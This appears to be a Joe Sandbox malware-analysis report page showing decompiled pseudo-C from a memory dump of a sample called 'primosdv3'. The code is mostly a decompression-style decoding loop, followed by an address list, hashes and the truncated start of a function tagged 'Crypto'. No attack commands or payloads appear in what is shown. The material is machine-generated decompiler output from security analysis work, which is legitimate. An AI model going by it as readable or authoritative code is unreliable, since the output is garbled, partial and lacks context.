																			 *_t710 =  *_t521;
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 1;
																			if(_t681 <= 1) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 2;
																			if(_t681 <= 2) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 3;
																			if(_t681 <= 3) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 4;
																			if(_t681 <= 4) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 5;
																			if(_t681 <= 5) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 6;
																			if(_t681 <= 6) {
																				goto L10;
																			}
																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			goto L35;
																		}
																		__eflags = _t544 - _t681;
																		if(_t544 >= _t681) {
																			_t401 = _t681 >> 3;
																			__eflags = _t401;
																			 *(_t725 + 0x34) = _t401;
																			_t687 = _t401;
																			do {
																				E00C80320(_t710, _t521, _t643);
																				_t725 = _t725 + 0xc;
																				_t643 = 8;
																				_t521 = _t521 + _t643;
																				_t710 = _t710 + _t643;
																				_t681 = _t681 - _t643;
																				_t687 = _t687 - 1;
																				__eflags = _t687;
																			} while (_t687 != 0);
																			goto L83;
																		}
																		_t547 = _t681 >> 3;
																		__eflags = _t547;
																		do {
																			_t681 = _t681 - _t643;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t410 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t643;
																			 *((char*)(_t710 + 7)) = _t410;
																			_t710 = _t710 + _t643;
																			_t547 = _t547 - 1;
																			__eflags = _t547;
																		} while (_t547 != 0);
																		goto L84;
																	}
																}
																_t555 = _t520 + (_t378 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t637 -  *_t555;
																	if(_t637 <  *_t555) {
																		break;
																	}
																	_t378 = _t378 + 1;
																	_t555 = _t555 + 4;
																	__eflags = _t378 - 0xf;
																	if(_t378 < 0xf) {
																		continue;
																	}
																	goto L125;
																}
																_t676 = _t378;
																goto L125;
															}
															_t556 = 0x10;
															_t645 = _t637 >> _t556 - _t377;
															_t559 = ( *(_t645 + _t520 + 0x2d7c) & 0x000000ff) + _t699[1];
															 *_t699 =  *_t699 + (_t559 >> 3);
															_t560 = _t559 & 0x00000007;
															 *(_t725 + 0x30) =  *_t699;
															_t699[1] = _t560;
															_t383 =  *(_t520 + 0x317c + _t645 * 2) & 0x0000ffff;
															 *(_t725 + 0x34) = _t560;
															goto L126;
														} else {
															goto L116;
														}
														do {
															L116:
															 *_t534 =  *(_t534 - 4);
															_t534 = _t534 - 4;
															_t635 = _t635 - 1;
															__eflags = _t635;
														} while (_t635 != 0);
														goto L117;
													}
													_t681 =  *(_t686 + 0x74);
													_t705 =  *(_t725 + 0x14);
													_t363 =  *(_t725 + 0x18);
													__eflags = _t681;
												}
												_push(_t725 + 0x38);
												_t439 = E00C73F9D(_t686, _t524);
												__eflags = _t439;
												if(_t439 == 0) {
													goto L145;
												}
												_t441 = E00C7253E(_t686, _t725 + 0x38);
												__eflags = _t441;
												if(_t441 == 0) {
													goto L145;
												}
												goto L35;
											}
											_t682 = _t634 - 0x106;
											__eflags = _t682 - 8;
											if(_t682 >= 8) {
												_t444 = (_t682 >> 2) - 1;
												 *(_t725 + 0x34) = _t444;
												_t681 = ((_t682 & 0x00000003 | 0x00000004) << _t444) + 2;
												__eflags = _t444;
												if(_t444 == 0) {
													L39:
													_t445 =  *(_t725 + 0x10);
													L40:
													_t446 = E00C6A89D(_t445);
													_t447 =  *(_t520 + 0xfa0);
													_t651 = _t446 & 0x0000fffe;
													__eflags = _t651 -  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4));
													if(_t651 >=  *((intOrPtr*)(_t520 + 0xf20 + _t447 * 4))) {
														_t711 = 0xf;
														_t448 = _t447 + 1;
														 *(_t725 + 0x28) = _t711;
														__eflags = _t448 - _t711;
														if(_t448 >= _t711) {
															L50:
															_t569 =  *(_t725 + 0x10);
															_t713 = _t569[1] +  *(_t725 + 0x2c);
															_t714 = _t713 & 0x00000007;
															 *_t569 =  *_t569 + (_t713 >> 3);
															 *(_t725 + 0x24) =  *_t569;
															_t452 =  *(_t725 + 0x2c);
															_t569[1] = _t714;
															_t570 = 0x10;
															 *(_t725 + 0x1c) = _t714;
															_t573 =  *((intOrPtr*)(_t520 + 0xf60 + _t452 * 4)) + (_t651 -  *((intOrPtr*)(_t520 + 0xf1c + _t452 * 4)) >> _t570 - _t452);
															__eflags = _t573 -  *((intOrPtr*)(_t520 + 0xf1c));
															asm("sbb eax, eax");
															_t453 = _t452 & _t573;
															__eflags = _t453;
															_t454 =  *(_t520 + 0x1ba4 + _t453 * 2) & 0x0000ffff;
															L51:
															_t654 = _t454 & 0x0000ffff;
															__eflags = _t654 - 4;
															if(_t654 >= 4) {
																_t457 = (_t654 >> 1) - 1;
																 *(_t725 + 0x30) = _t457;
																_t575 = ((_t654 & 0x00000001 | 0x00000002) << _t457) + 1;
																 *(_t725 + 0x34) = _t575;
																_t715 = _t575;
																 *(_t725 + 0x28) = _t715;
																__eflags = _t457;
																if(_t457 == 0) {
																	L70:
																	__eflags = _t715 - 0x100;
																	if(_t715 > 0x100) {
																		_t681 = _t681 + 1;
																		__eflags = _t715 - 0x2000;
																		if(_t715 > 0x2000) {
																			_t681 = _t681 + 1;
																			__eflags = _t715 - 0x40000;
																			if(_t715 > 0x40000) {
																				_t681 = _t681 + 1;
																				__eflags = _t681;
																			}
																		}
																	}
																	 *(_t686 + 0x6c) =  *(_t686 + 0x68);
																	 *(_t686 + 0x68) =  *(_t686 + 0x64);
																	 *(_t686 + 0x64) =  *(_t686 + 0x60);
																	 *(_t686 + 0x60) = _t715;
																	_t658 =  *(_t686 + 0x7c);
																	_t577 = _t658 - _t715;
																	_t462 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	 *(_t686 + 0x74) = _t681;
																	 *(_t725 + 0x34) = _t577;
																	__eflags = _t577 - _t462;
																	if(_t577 >= _t462) {
																		goto L92;
																	} else {
																		__eflags = _t658 - _t462;
																		if(_t658 >= _t462) {
																			goto L92;
																		}
																		_t466 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t710 = _t466 + _t658;
																		_t521 = _t466 + _t577;
																		_t661 = 8;
																		 *(_t686 + 0x7c) = _t658 + _t681;
																		__eflags = _t681 - _t661;
																		if(_t681 < _t661) {
																			goto L84;
																		}
																		__eflags =  *(_t725 + 0x28) - _t681;
																		if( *(_t725 + 0x28) >= _t681) {
																			_t469 = _t681 >> 3;
																			__eflags = _t469;
																			 *(_t725 + 0x34) = _t469;
																			_t689 = _t469;
																			do {
																				E00C80320(_t710, _t521, _t661);
																				_t725 = _t725 + 0xc;
																				_t661 = 8;
																				_t521 = _t521 + _t661;
																				_t710 = _t710 + _t661;
																				_t681 = _t681 - _t661;
																				_t689 = _t689 - 1;
																				__eflags = _t689;
																			} while (_t689 != 0);
																			goto L83;
																		}
																		_t580 = _t681 >> 3;
																		__eflags = _t580;
																		do {
																			_t681 = _t681 - _t661;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t478 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t661;
																			 *((char*)(_t710 + 7)) = _t478;
																			_t710 = _t710 + _t661;
																			_t580 = _t580 - 1;
																			__eflags = _t580;
																		} while (_t580 != 0);
																		goto L84;
																	}
																}
																__eflags = _t457 - 4;
																if(__eflags < 0) {
																	_t479 = E00C78934( *(_t725 + 0x10));
																	_t662 =  *(_t725 + 0x10);
																	_t582 = 0x20;
																	_t585 =  *(_t725 + 0x1c) +  *(_t725 + 0x30);
																	_t715 = (_t479 >> _t582 -  *(_t725 + 0x30)) +  *(_t725 + 0x34);
																	_t586 = _t585 & 0x00000007;
																	__eflags = _t586;
																	 *_t662 = (_t585 >> 3) +  *(_t725 + 0x20);
																	_t662[1] = _t586;
																	L69:
																	 *(_t725 + 0x28) = _t715;
																	goto L70;
																}
																if(__eflags <= 0) {
																	_t483 =  *(_t725 + 0x10);
																} else {
																	_t499 = E00C78934( *(_t725 + 0x10));
																	_t500 =  *(_t725 + 0x30);
																	_t604 = 0x24;
																	_t607 =  *(_t725 + 0x1c) + _t500 + 0xfffffffc;
																	_t715 = (_t499 >> _t604 - _t500 << 4) +  *(_t725 + 0x34);
																	_t669 =  *(_t725 + 0x20) + (_t607 >> 3);
																	_t483 =  *(_t725 + 0x10);
																	_t608 = _t607 & 0x00000007;
																	 *(_t725 + 0x20) = _t669;
																	 *(_t725 + 0x1c) = _t608;
																	 *_t483 = _t669;
																	_t483[1] = _t608;
																}
																_t484 = E00C6A89D(_t483);
																_t485 =  *(_t520 + 0x1e8c);
																_t664 = _t484 & 0x0000fffe;
																__eflags = _t664 -  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4));
																if(_t664 >=  *((intOrPtr*)(_t520 + 0x1e0c + _t485 * 4))) {
																	_t588 = 0xf;
																	_t486 = _t485 + 1;
																	 *(_t725 + 0x28) = _t588;
																	__eflags = _t486 - _t588;
																	if(_t486 >= _t588) {
																		L66:
																		_t690 =  *(_t725 + 0x10);
																		_t590 = ( *(_t725 + 0x10))[1] +  *(_t725 + 0x2c);
																		 *_t690 =  *_t690 + (_t590 >> 3);
																		_t690[1] = _t590 & 0x00000007;
																		_t491 =  *(_t725 + 0x2c);
																		_t592 = 0x10;
																		_t595 =  *((intOrPtr*)(_t520 + 0x1e4c + _t491 * 4)) + (_t664 -  *((intOrPtr*)(_t520 + 0x1e08 + _t491 * 4)) >> _t592 - _t491);
																		__eflags = _t595 -  *((intOrPtr*)(_t520 + 0x1e08));
																		asm("sbb eax, eax");
																		_t492 = _t491 & _t595;
																		__eflags = _t492;
																		_t493 =  *(_t520 + 0x2a90 + _t492 * 2) & 0x0000ffff;
																		goto L67;
																	}
																	_t597 = _t520 + (_t486 + 0x783) * 4;
																	while(1) {
																		__eflags = _t664 -  *_t597;
																		if(_t664 <  *_t597) {
																			break;
																		}
																		_t486 = _t486 + 1;
																		_t597 = _t597 + 4;
																		__eflags = _t486 - 0xf;
																		if(_t486 < 0xf) {
																			continue;
																		}
																		goto L66;
																	}
																	 *(_t725 + 0x28) = _t486;
																	goto L66;
																} else {
																	_t691 =  *(_t725 + 0x10);
																	_t598 = 0x10;
																	_t667 = _t664 >> _t598 - _t485;
																	_t601 = ( *(_t667 + _t520 + 0x1e90) & 0x000000ff) +  *(_t725 + 0x1c);
																	 *_t691 = (_t601 >> 3) +  *(_t725 + 0x20);
																	_t691[1] = _t601 & 0x00000007;
																	_t493 =  *(_t520 + 0x2290 + _t667 * 2) & 0x0000ffff;
																	L67:
																	_t686 =  *(_t725 + 0x24);
																	_t715 = _t715 + (_t493 & 0x0000ffff);
																	goto L69;
																}
															}
															_t715 = _t654 + 1;
															goto L69;
														}
														_t610 = _t520 + (_t448 + 0x3c8) * 4;
														while(1) {
															__eflags = _t651 -  *_t610;
															if(_t651 <  *_t610) {
																break;
															}
															_t448 = _t448 + 1;
															_t610 = _t610 + 4;
															__eflags = _t448 - _t711;
															if(_t448 < _t711) {
																continue;
															}
															goto L50;
														}
														 *(_t725 + 0x28) = _t448;
														goto L50;
													}
													_t611 = 0x10;
													_t670 = _t651 >> _t611 - _t447;
													_t614 = ( *(_t670 + _t520 + 0xfa4) & 0x000000ff) + _t697;
													_t723 =  *(_t725 + 0x1c) + (_t614 >> 3);
													_t506 =  *(_t725 + 0x10);
													_t615 = _t614 & 0x00000007;
													 *(_t725 + 0x20) = _t723;
													 *(_t725 + 0x1c) = _t615;
													 *_t506 = _t723;
													_t506[1] = _t615;
													_t454 =  *(_t520 + 0x13a4 + _t670 * 2) & 0x0000ffff;
													goto L51;
												}
												_t507 = E00C6A89D( *(_t725 + 0x10));
												_t724 = _t697 +  *(_t725 + 0x34);
												_t617 = 0x10;
												_t681 = _t681 + (_t507 >> _t617 -  *(_t725 + 0x34));
												_t620 =  *(_t725 + 0x1c) + (_t724 >> 3);
												_t445 =  *(_t725 + 0x10);
												_t697 = _t724 & 0x00000007;
												 *(_t725 + 0x1c) = _t620;
												 *_t445 = _t620;
												_t445[1] = _t697;
												goto L40;
											}
											 *(_t725 + 0x1c) = _t375;
											_t681 = _t682 + 2;
											__eflags = _t681;
											goto L39;
										}
										 *( *((intOrPtr*)(_t686 + 0x4b40)) +  *(_t686 + 0x7c)) = _t634;
										_t72 = _t686 + 0x7c;
										 *_t72 =  *(_t686 + 0x7c) + 1;
										__eflags =  *_t72;
										goto L35;
									}
									_t623 = _t520 + (_t369 + 0xd) * 4;
									while(1) {
										__eflags = _t630 -  *_t623;
										if(_t630 <  *_t623) {
											break;
										}
										_t369 = _t369 + 1;
										_t623 = _t623 + 4;
										__eflags = _t369 - 0xf;
										if(_t369 < 0xf) {
											continue;
										}
										_t528 =  *(_t725 + 0x28);
										goto L32;
									}
									_t528 = _t369;
									 *(_t725 + 0x28) = _t369;
									goto L32;
								}
								_t624 = 0x10;
								_t671 = _t630 >> _t624 - _t368;
								_t524 = _t674;
								_t707 = ( *(_t671 + _t520 + 0xb8) & 0x000000ff) + _t524[1];
								 *_t524 =  *_t524 + (_t707 >> 3);
								_t697 = _t707 & 0x00000007;
								_t375 =  *_t524;
								_t524[1] = _t697;
								_t633 =  *(_t520 + 0x4b8 + _t671 * 2) & 0x0000ffff;
								 *(_t725 + 0x1c) = _t375;
								goto L33;
							}
							__eflags = _t526 - _t628;
							if(_t526 == _t628) {
								goto L24;
							}
							E00C75202(_t686);
							__eflags =  *((intOrPtr*)(_t686 + 0x4c5c)) -  *((intOrPtr*)(_t686 + 0x4c4c));
							if(__eflags > 0) {
								L6:
								return 0;
							}
							if(__eflags < 0) {
								goto L24;
							}
							__eflags =  *((intOrPtr*)(_t686 + 0x4c58)) -  *((intOrPtr*)(_t686 + 0x4c48));
							if( *((intOrPtr*)(_t686 + 0x4c58)) >  *((intOrPtr*)(_t686 + 0x4c48))) {
								goto L6;
							}
							goto L24;
						}
					}
					L5:
					 *((char*)(_t520 + 0x4ad0)) = 1;
					goto L6;
				}
				 *((char*)(_t520 + 0x2c)) = 1;
				_push(_t520 + 0x30);
				_push(_t672);
				_push(_t692);
				if(E00C743BF(__ecx) == 0) {
					goto L5;
				} else {
					goto L4;
				}
			}

0x00c777f3
0x00c777f9
0x00c777ff
0x00c77803
0x00c77807
0x00c7780a
0x00c7780e
0x00c77825
0x00c77829
0x00c7782c
0x00c77833
0x00c7784d
0x00c7784f
0x00c77852
0x00c77856
0x00c7785a
0x00c7785e
0x00c77860
0x00c77862
0x00c77862
0x00c77866
0x00c77874
0x00c77877
0x00c7787d
0x00c7787f
0x00c77882
0x00c77884
0x00c77888
0x00000000
0x00000000
0x00c7788a
0x00c7788a
0x00c7788c
0x00c781e3
0x00000000
0x00c781e3
0x00c77892
0x00c778a0
0x00c778a0
0x00c778a2
0x00c778b1
0x00c778b1
0x00c778b7
0x00c781dc
0x00c781dc
0x00000000
0x00c781dc
0x00000000
0x00c778b7
0x00c778a4
0x00c778ab
0x00000000
0x00000000
0x00000000
0x00c778ab
0x00c77897
0x00c7789a
0x00000000
0x00000000
0x00000000
0x00c778bd
0x00c778bd
0x00c778c9
0x00c778ce
0x00c77901
0x00c77901
0x00c77907
0x00c7790e
0x00c77914
0x00c7791a
0x00c7791e
0x00c77953
0x00c77954
0x00c77955
0x00c77959
0x00c7795b
0x00c7797c
0x00c7797f
0x00c77983
0x00c77989
0x00c7798d
0x00c77991
0x00c77995
0x00c7799a
0x00c779a7
0x00c779a9
0x00c779ac
0x00c779ae
0x00c779ae
0x00c779b0
0x00c779b4
0x00c779bc
0x00c779c0
0x00c779c0
0x00c779c8
0x00c779ca
0x00c779e8
0x00c779ee
0x00c77e80
0x00c77e82
0x00c77eb2
0x00c77eb8
0x00c77fb2
0x00c77fb2
0x00c77fbb
0x00c77fbe
0x00c77fc0
0x00c77fc4
0x00c77fd3
0x00c77fd3
0x00c77fd6
0x00c77fdc
0x00c77fe3
0x00c77fe9
0x00c77fef
0x00c77ff6
0x00c7802f
0x00c78030
0x00c78031
0x00c78033
0x00c7804f
0x00c78052
0x00c78056
0x00c78059
0x00c7805f
0x00c78069
0x00c7806c
0x00c78072
0x00c78075
0x00c78082
0x00c78084
0x00c7808a
0x00c7808c
0x00c7808c
0x00c7808e
0x00c78096
0x00c78096
0x00c78099
0x00c7809c
0x00c780ae
0x00c780b3
0x00c780b6
0x00c780b8
0x00c780be
0x00c780c3
0x00c780c9
0x00c780d2
0x00c780d4
0x00c780df
0x00c780df
0x00c780e2
0x00c780e4
0x00c780e4
0x00c7809e
0x00c7809e
0x00c7809e
0x00c780e7
0x00c780f2
0x00c780f6
0x00c780fb
0x00c780fd
0x00c78100
0x00c78102
0x00c7819e
0x00c7819e
0x00c781a2
0x00c781a6
0x00c781a8
0x00000000
0x00000000
0x00c781ae
0x00c781b4
0x00c781ba
0x00c781bc
0x00c781c0
0x00c781c6
0x00c781cd
0x00c781cf
0x00c781d2
0x00c781d2
0x00c781d2
0x00000000
0x00c78108
0x00c78108
0x00c7810a
0x00000000
0x00000000
0x00c78110
0x00c78118
0x00c7811b
0x00c78121
0x00c78122
0x00c78125
0x00c78127
0x00c77daa
0x00c77daa
0x00c77dae
0x00c77db2
0x00c77db4
0x00c7786c
0x00c7786c
0x00c77870
0x00c77870
0x00c77870
0x00c77874
0x00c77874
0x00c77877
0x00c7787d
0x00c7787f
0x00c77882
0x00c77884
0x00c77888
0x00000000
0x00000000
0x00000000
0x00c77888
0x00c77ed1
0x00c77edc
0x00c77edf
0x00c77ee4
0x00c77ee6
0x00c77ee8
0x00c77f84
0x00c77f84
0x00c77f8a
0x00c77f90
0x00c77f92
0x00c77f96
0x00c77f9c
0x00c77fa3
0x00c77fa5
0x00c77fa8
0x00c77fa8
0x00c77fa8
0x00c779db
0x00c779db
0x00c779df
0x00000000
0x00c779df
0x00c77eee
0x00c77ef0
0x00000000
0x00000000
0x00c77ef6
0x00c77efe
0x00c77f01
0x00c77f07
0x00c77f08
0x00c77f0b
0x00c77f0d
0x00000000
0x00000000
0x00c77f13
0x00c77f15
0x00c77f5d
0x00c77f5d
0x00c77f60
0x00c77f64
0x00c77f66
0x00c77f69
0x00c77f6e
0x00c77f73
0x00c77f74
0x00c77f76
0x00c77f78
0x00c77f7a
0x00c77f7a
0x00c77f7a
0x00c77da6
0x00c77da6
0x00000000
0x00c77da6
0x00c77f19
0x00c77f19
0x00c77f1c
0x00c77f1e
0x00c77f20
0x00c77f26
0x00c77f2c
0x00c77f32
0x00c77f38
0x00c77f3e
0x00c77f44
0x00c77f47
0x00c77f4a
0x00c77f4c
0x00c77f4f
0x00c77f51
0x00c77f51
0x00c77f51
0x00000000
0x00c77e3a
0x00c77e3a
0x00c77e3e
0x00c77e42
0x00c77e46
0x00c77e46
0x00c77e4e
0x00c77e54
0x00c77e58
0x00c77e5e
0x00c77e60
0x00c77e64
0x00c77e6a
0x00c77e71
0x00c77e73
0x00c77e76
0x00c77e76
0x00c77e76
0x00000000
0x00c77e7b
0x00c77dbc
0x00c77dbf
0x00c77dc3
0x00c77dc6
0x00000000
0x00000000
0x00c77dcf
0x00c77dd2
0x00c77dd6
0x00c77dd9
0x00000000
0x00000000
0x00c77de2
0x00c77de5
0x00c77de9
0x00c77dec
0x00000000
0x00000000
0x00c77df5
0x00c77df8
0x00c77dfc
0x00c77dff
0x00000000
0x00000000
0x00c77e08
0x00c77e0b
0x00c77e0f
0x00c77e12
0x00000000
0x00000000
0x00c77e1b
0x00c77e1e
0x00c77e22
0x00c77e25
0x00000000
0x00000000
0x00c77e2e
0x00c77e32
0x00000000
0x00c77e32
0x00c7812d
0x00c7812f
0x00c78177
0x00c78177
0x00c7817a
0x00c7817e
0x00c78180
0x00c78183
0x00c78188
0x00c7818d
0x00c7818e
0x00c78190
0x00c78192
0x00c78194
0x00c78194
0x00c78194
0x00000000
0x00c78199
0x00c78133
0x00c78133
0x00c78136
0x00c78138
0x00c7813a
0x00c78140
0x00c78146
0x00c7814c
0x00c78152
0x00c78158
0x00c7815e
0x00c78161
0x00c78164
0x00c78166
0x00c78169
0x00c7816b
0x00c7816b
0x00c7816b
0x00000000
0x00c78170
0x00c78102
0x00c7803b
0x00c7803e
0x00c7803e
0x00c78040
0x00000000
0x00000000
0x00c78042
0x00c78043
0x00c78046
0x00c78049
0x00000000
0x00000000
0x00000000
0x00c7804b
0x00c7804d
0x00000000
0x00c7804d
0x00c77ffa
0x00c77ffd
0x00c78007
0x00c7800f
0x00c78012
0x00c78018
0x00c7801c
0x00c7801f
0x00c78027
0x00000000
0x00000000
0x00000000
0x00000000
0x00c77fc6
0x00c77fc6
0x00c77fc9
0x00c77fcb
0x00c77fce
0x00c77fce
0x00c77fce
0x00000000
0x00c77fc6
0x00c77ebe
0x00c77ec1
0x00c77ec5
0x00c77ec9
0x00c77ec9
0x00c77e88
0x00c77e8c
0x00c77e91
0x00c77e93
0x00000000
0x00000000
0x00c77ea0
0x00c77ea5
0x00c77ea7
0x00000000
0x00000000
0x00000000
0x00c77ead
0x00c779f4
0x00c779fa
0x00c779fd
0x00c77a74
0x00c77a77
0x00c77a7d
0x00c77a80
0x00c77a82
0x00c77a06
0x00c77a06
0x00c77a0a
0x00c77a0c
0x00c77a13
0x00c77a19
0x00c77a1f
0x00c77a26
0x00c77abe
0x00c77abf
0x00c77ac0
0x00c77ac4
0x00c77ac6
0x00c77ae3
0x00c77ae3
0x00c77aec
0x00c77af2
0x00c77af8
0x00c77afc
0x00c77b00
0x00c77b04
0x00c77b07
0x00c77b0a
0x00c77b1e
0x00c77b20
0x00c77b26
0x00c77b28
0x00c77b28
0x00c77b2a
0x00c77b32
0x00c77b32
0x00c77b35
0x00c77b38
0x00c77b4c
0x00c77b4f
0x00c77b55
0x00c77b58
0x00c77b5c
0x00c77b5e
0x00c77b62
0x00c77b64
0x00c77cc9
0x00c77cc9
0x00c77ccf
0x00c77cd1
0x00c77cd2
0x00c77cd8
0x00c77cda
0x00c77cdb
0x00c77ce1
0x00c77ce3
0x00c77ce3
0x00c77ce3
0x00c77ce1
0x00c77cd8
0x00c77ce7
0x00c77ced
0x00c77cf3
0x00c77cf6
0x00c77cf9
0x00c77d04
0x00c77d06
0x00c77d0b
0x00c77d0e
0x00c77d12
0x00c77d14
0x00000000
0x00c77d1a
0x00c77d1a
0x00c77d1c
0x00000000
0x00000000
0x00c77d22
0x00c77d2a
0x00c77d2d
0x00c77d33
0x00c77d34
0x00c77d37
0x00c77d39
0x00000000
0x00000000
0x00c77d3b
0x00c77d3f
0x00c77d84
0x00c77d84
0x00c77d87
0x00c77d8b
0x00c77d8d
0x00c77d90
0x00c77d95
0x00c77d9a
0x00c77d9b
0x00c77d9d
0x00c77d9f
0x00c77da1
0x00c77da1
0x00c77da1
0x00000000
0x00c77d8d
0x00c77d43
0x00c77d43
0x00c77d46
0x00c77d48
0x00c77d4a
0x00c77d50
0x00c77d56
0x00c77d5c
0x00c77d62
0x00c77d68
0x00c77d6e
0x00c77d71
0x00c77d74
0x00c77d76
0x00c77d79
0x00c77d7b
0x00c77d7b
0x00c77d7b
0x00000000
0x00c77d80
0x00c77d14
0x00c77b6a
0x00c77b6d
0x00c77c94
0x00c77c99
0x00c77ca1
0x00c77cac
0x00c77cb0
0x00c77cbd
0x00c77cbd
0x00c77cc0
0x00c77cc2
0x00c77cc5
0x00c77cc5
0x00000000
0x00c77cc5
0x00c77b73
0x00c77bbc
0x00c77b75
0x00c77b79
0x00c77b84
0x00c77b8a
0x00c77b96
0x00c77b9b
0x00c77ba4
0x00c77ba6
0x00c77baa
0x00c77bad
0x00c77bb1
0x00c77bb5
0x00c77bb7
0x00c77bb7
0x00c77bc2
0x00c77bc9
0x00c77bcf
0x00c77bd5
0x00c77bdc
0x00c77c14
0x00c77c15
0x00c77c16
0x00c77c1a
0x00c77c1c
0x00c77c3a
0x00c77c3e
0x00c77c47
0x00c77c53
0x00c77c57
0x00c77c5a
0x00c77c5e
0x00c77c71
0x00c77c73
0x00c77c79
0x00c77c7b
0x00c77c7b
0x00c77c7d
0x00000000
0x00c77c7d
0x00c77c24
0x00c77c27
0x00c77c27
0x00c77c29
0x00000000
0x00000000
0x00c77c2b
0x00c77c2c
0x00c77c2f
0x00c77c32
0x00000000
0x00000000
0x00000000
0x00c77c34
0x00c77c36
0x00000000
0x00c77bde
0x00c77bde
0x00c77be4
0x00c77be7
0x00c77bf1
0x00c77c01
0x00c77c05
0x00c77c08
0x00c77c85
0x00c77c85
0x00c77c8c
0x00000000
0x00c77c8c
0x00c77bdc
0x00c77b3a
0x00000000
0x00c77b3a
0x00c77ace
0x00c77ad1
0x00c77ad1
0x00c77ad3
0x00000000
0x00000000
0x00c77ad5
0x00c77ad6
0x00c77ad9
0x00c77adb
0x00000000
0x00000000
0x00000000
0x00c77add
0x00c77adf
0x00000000
0x00c77adf
0x00c77a2e
0x00c77a31
0x00c77a3b
0x00c77a46
0x00c77a48
0x00c77a4c
0x00c77a4f
0x00c77a53
0x00c77a57
0x00c77a59
0x00c77a5c
0x00000000
0x00c77a5c
0x00c77a88
0x00c77a8d
0x00c77a93
0x00c77a9e
0x00c77aa5
0x00c77aa7
0x00c77aab
0x00c77aae
0x00c77ab2
0x00c77ab4
0x00000000
0x00c77ab4
0x00c779ff
0x00c77a03
0x00c77a03
0x00000000
0x00c77a03
0x00c779d5
0x00c779d8
0x00c779d8
0x00c779d8
0x00000000
0x00c779d8
0x00c77960
0x00c77963
0x00c77963
0x00c77965
0x00000000
0x00000000
0x00c77967
0x00c77968
0x00c7796b
0x00c7796e
0x00000000
0x00000000
0x00c77970
0x00000000
0x00c77970
0x00c77976
0x00c77978
0x00000000
0x00c77978
0x00c77922
0x00c77925
0x00c77927
0x00c77931
0x00c77939
0x00c7793b
0x00c7793e
0x00c77940
0x00c77943
0x00c7794b
0x00000000
0x00c7794b
0x00c778d0
0x00c778d2
0x00000000
0x00000000
0x00c778d6
0x00c778e1
0x00c778e7
0x00c7783c
0x00000000
0x00c7783c
0x00c778ed
0x00000000
0x00000000
0x00c778f5
0x00c778fb
0x00000000
0x00000000
0x00000000
0x00c778fb
0x00c77874
0x00c77835
0x00c77835
0x00000000
0x00c77835
0x00c77813
0x00c77817
0x00c77818
0x00c77819
0x00c77821
0x00000000
0x00c77823
0x00000000
0x00c77823

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction ID: bdf373b9b640758f9a64f31fd478c05b92f3309922907cc78a437e45df89ab36
Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
Instruction Fuzzy Hash: BF62C8716083498FCB15CF28C8905B9BBE1BF99304F18CA6DE9AE8B346D730E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00C6F461 Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00C6F461(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
